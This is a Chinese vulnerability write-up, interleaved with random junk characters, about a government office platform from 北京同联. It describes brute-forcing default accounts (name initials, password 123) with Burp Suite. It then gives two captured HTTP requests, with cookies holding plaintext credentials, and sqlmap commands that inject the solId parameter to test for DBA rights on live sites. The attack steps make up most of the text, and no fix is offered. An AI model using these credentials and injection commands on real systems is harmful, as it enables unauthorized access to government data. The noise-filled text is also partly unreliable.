8 R! t0 Q) L$ \% s0 M' b" } 5 F7 K0 y. E3 z' W" l% K6 o- O
6 A5 O* o( I* J8 @. f
( d& ]* y' W" P1 B" N 平台简介:
8 j- h& y3 \9 p, ] 0 I. D' n! L" [! C. C
3 _! X2 B! u! K l4 o D9 B
7 q" l1 |! S- l* q ; b5 z" z3 ^1 |- c L6 m5 f: Y2 y
+ ~) h" [% M* @5 V 北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
2 ~4 i3 x2 L9 M4 K" S# M同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。 \6 O8 C2 }+ i% X
同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!* ?4 i/ ]- A# W$ ^0 U( C
5 u2 N' A6 V: F3 y
6 A* N4 d: ~! X$ O: a! Y) L5 R1 H- \
/ Z7 }' l' L1 ~9 r8 @ y- r
. p G6 c% l" _: I8 X8 t. W6 O1 X- J; e/ w/ s( `0 G
由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:
% X( W) v, ]( v1 h* t1 A2 b
: f$ ]- z: H1 d9 ?* ]
0 c7 Q7 G L+ o- ^/ D% y* R ) w( o5 L. ]2 N
- k, [. s K2 O" {
+ i! x, B1 ?5 [1 {1 z( T0 H5 e+ N http://1.1.1.1:7197/cap-aco/#(案例2-)
* G& r' w9 \' t' ]1 ^% ?3 c + A R3 n6 X- W
- R. s! n* i9 d) u: `$ w6 z
http://www.XXOO.com (案例1-官网网站)/ g1 A" u: z( n1 c X+ K2 D; ^
) ?/ |1 h. \% p( Q( k* {' @' `8 _! h" {* K
* C+ A* E+ P7 u1 T
# U. N0 G- Q- b$ v
6 H* z2 P6 w- a* k& f, } 漏洞详情:
5 X- p7 I, \% |% w
6 U" {, t* l+ l/ ?# ^, ^, M
% c$ r3 S8 R! C9 t3 z. U 初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试
4 g6 |/ N: `" Z: T8 f* d
; r2 L( y7 o" k$ s0 d
N# S- R: `% N1 m7 t3 t 首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:
4 n: o7 b8 ^0 n8 h* ~, ` 2 }/ `8 \5 ]4 x/ J/ L
0 x7 ^1 C$ R7 y+ l2 M: j* `
+ F; j' u9 e' c) q7 w* U) |
1 l/ ~, q( Q+ q) `6 ?: a3 I! {
# [/ I2 \0 S! y8 O. G, O ' s' m! a( }7 v3 Q
' b. k8 H& |! |; |( ^
2 }2 I7 @! C# I9 T/ r status为302即表示破解成功,然后找个破解成功的账号登录系统。经过长时间的手工测试发现在发文管理模块抓包,抓包的数据分别如下:
1 m Q5 @% R; u / t0 k4 n( C4 c
1 Q; O# O' I" u1 j6 P! q 1、案例1-官方网站
$ R* L% ?' j# K+ G2 A' |$ f; C
% X2 x. Z& H; I p# ^0 X" E. C0 k8 T! \$ H x
GET /bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=42b0234e-d5dc-402d-9cef-1ce38cbae480&state=&title=1111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510060789826 HTTP/1.1
3 J: a+ |! }( A( z+ V o H
3 L# v8 \' s2 C; z) G6 D) X
; v6 p' J$ ?$ R2 S2 H Host: www.XXOO.com
* ]3 ~8 ^; d V
" p" \2 A8 y5 G
& W) R8 C4 G: n# E0 e) { Proxy-Connection: Keep-Alive
" M7 y3 _' y3 ^$ Y4 S + m6 Q! y& s) k# W4 R0 o
1 k. n! w' ^: l Accept: application/json, text/javascript, */*; q=0.01
) U0 W1 L8 c+ }7 n$ T 6 }1 G. C Z4 Z* H
) n# C: Z3 b# O6 z/ `& X7 }5 w# _& U+ a, \ Accept-Language: zh-CN" \( S: x) {1 d: G* {( C& E" n
1 ?* P: {3 Y0 {! I! I! a" F% v* `( j: N: d b6 J
Content-Type: application/json
2 t+ t7 G+ a! q8 m ; Y) T! m7 X$ C1 j( j2 k3 n6 Y" s3 U
% V" A' o5 X) t4 e1 U User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0; SE 2.X MetaSr 1.0) like Gecko& Z M* G- i3 j% F: g
6 D9 r* y9 f& R/ l4 `
2 L% x6 b& E" j0 Q. m X-Requested-With: XMLHttpRequest
( f+ J, r3 V% d) n m" \9 _7 ]! p6 q
9 O4 R) s' {6 H+ g. Q: P3 o9 d
Referer: http://www.XXOO.com/bizRunContro ... 80?modCode=1008M002
1 J7 w; k g9 e3 K
/ |& e+ N% v, o8 k+ d, g
% T" u+ l2 q) |& C% r5 j; V" R Accept-Encoding: gzip, deflate, sdch
d, ^" B! u# B
) P5 ]& \9 S& M- ?4 ?. t( w- a( V3 f& G+ J0 Q9 V+ h: {+ o: e2 B
Cookie: username=chm; password=123; rememberme=1; autoSubmit=1; sid=2cf5142f-6c1e-4cbb-89d8-2ebd08438b2e. {7 v8 h$ p9 E& q9 @
* \4 U' a' h, C6 R% K( N% N
+ A* a6 h0 @7 I 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r tl.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:
3 z# T+ ~( L0 Q6 L8 u# g$ F ) n! t( O% l4 X1 U' {# p
+ A7 o! o: {; f& x% f; q; q
: B6 _+ Q9 D3 |: m2 Q G' K
8 y9 [, E# m$ A+ `! C. m: i3 R! Q6 k1 B
Y% ^+ m, _, l9 r/ I# n: I1 z& B
1 t1 Y3 i% @1 D" K
: k9 i" n# ] }6 l. a% K + W+ H7 f3 y3 A/ F2 Q- e
u4 t" v0 F9 z3 V+ o y
! A [2 i; X- n5 c2 g; B
- X# O* x7 z( O: s& g$ g
- |% I5 `5 Z5 r- s" e7 R% W- C. E. w, G2 o4 i; M; g$ m
" Y% W5 E" p8 C: A
7 I4 ^% [2 B. r- n' A
& A3 T% H! z. k: m% \ {2 `
2、案例2-某天河云平台5 V% y% a+ M; \
! T6 o0 f) N* M/ a
+ U; X; h, b4 t- k# i- N GET /cap-aco/bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=af056885-4ae5-4e0b-8a0d-c413a786f2db&state=&title=11111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510047738662 HTTP/1.1
) O# ^( L# U0 d) ?- `3 b 3 O5 Y( H: }5 V6 a; v2 l/ V
! x, \; Q! O$ q$ Q/ g% Z: I
Host: 1.1.1.:7197* K- l" k/ |) P4 |9 h+ c
& M4 b! I$ y4 j4 f
% E3 \2 A0 P4 c z" x3 _ Accept: application/json, text/javascript, */*; q=0.01! s$ D, v0 ?3 E0 i
Z0 h9 `' T- ?' F
5 t1 k0 J3 S: \ X-Requested-With: XMLHttpRequest! L1 R! A1 q9 m
8 k! q& y+ o2 E0 D$ h# k K$ m A
D/ d( W; |! q8 s- j" Q6 @( \6 g* L
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0
5 J4 b. _5 g$ ~' E
- F G# c+ f, E9 W/ s
" @5 y+ X- F+ c8 D; b Content-Type: application/json
% \& M1 P& G2 R) L& _1 e9 y
9 B4 l; Z4 O) Y! Z+ [4 m1 }* {% F4 r
9 ?% }0 |6 z# n3 B& I1 m5 R Referer: http://1.1.1.1:7197/cap-aco/bizR ... 86f2db?modCode=1008
& m$ R" V# S. E2 K
( p! y( ~% z; |2 Z- x, h* C' F
7 i" O' s+ w) m Accept-Language: zh-CN,zh;q=0.8$ h2 v* h; [3 h5 b) G# `
$ j3 [7 x4 R# q) M0 x* }8 j, P& C/ t$ |% g
Cookie: autoSubmit=1; sid=4e333ec9-d194-456b-bb08-4ff64c6eb1fc; username=lxr; password=123; rememberme=1; autoSubmit=12 l" i' Z: o4 A- _1 j
j& [3 C7 N3 p3 y5 q! o* g9 q
6 c2 `! ~7 e& u Connection: close
+ }- K8 V8 }/ F/ @2 B9 K7 g ! R1 E7 C, C. i" U; _" [' k
& k/ {+ N; ?8 T; J9 \" _, F 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r 1.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:
1 g) g0 U4 N6 t3 i% Q M) [% U F, T' |
; J2 L& l" o+ O$ B) x5 Z, m 3 w P1 R$ e7 i
4 S1 U$ ]' q0 h
- g8 Q4 D/ C6 `/ z
% I+ `) p/ K+ [# s0 j- J. v. q! Y |